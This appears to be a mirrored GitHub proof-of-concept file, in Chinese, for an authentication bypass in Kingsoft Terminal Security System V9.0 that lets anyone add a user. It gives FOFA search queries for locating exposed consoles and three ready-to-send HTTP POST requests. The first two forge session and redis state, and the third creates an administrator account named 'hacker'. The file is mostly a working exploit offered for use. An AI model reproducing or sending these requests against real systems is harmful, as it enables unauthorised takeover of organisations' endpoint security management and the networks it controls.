admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 19:07:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/金山/金山终端安全系统V9.0任意用户添加漏洞.md

78 lines
3.1 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 金山终端安全系统V9.0任意用户添加漏洞
## fofa
```javascript
title=="用户登录-猎鹰终端安全系统V9.0Web控制台"
app="金山终端安全系统V9.0Web控制台"
```
## poc
首先访问 checklogin.php设置$_SESSION[userName]。(后续的 Cookie 保持不变)
```javascript
POST /inter/ajax.php?imd=checklogin HTTP/1.1
Host: 192.168.20.131:6868
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://192.168.20.131:6868
Connection: close
Referer: http://192.168.20.131:6868/
Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
uname=login_session_
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301550929.png)
接下来访问 send_verify2email.php 在 redis 中添加一个键值对:mailTo 符合邮箱格式即可)
```javascript
POST /inter/ajax.php?imd=send_verify2email HTTP/1.1
Host: 192.168.20.131:6868
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://192.168.20.131:6868
Connection: close
Referer: http://192.168.20.131:6868/
Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
mailTo=login_session_@qq.comEmail
```
![image-20241230155135464](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301551573.png)
面两个步骤访问完成之后,即可未授权访问系统的所有功能,接下来通过权限校验,添加一个系统管理员,访问 get_user_login_cmd 文件即可。(userSession 需要设置成 Email密码为 1qaz@WSX)
```javascript
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: 192.168.20.131:6868
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest
Content-Length: 285
Origin: http://192.168.20.131:6868
Connection: close
Referer: http://192.168.20.131:6868/
Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964
{"add_user_info_cmd":{"userSession":"Email","mode_id":"B666A8CD-2247-2CA8-4F7D-29EB058A27C2","real_name":"","user_name":"hacker","type":"分级管理员","tel":"","mobile":"","corp":"","notice":"","psw":"92d7ddd2a010c59511dc2905b7e14f64","email":"","VHierarchyName":"","orgtype":"1"}}
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301552673.png)
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301552975.png)
## 漏洞来源
- https://xz.aliyun.com/t/16105
Reference in New Issue Copy Permalink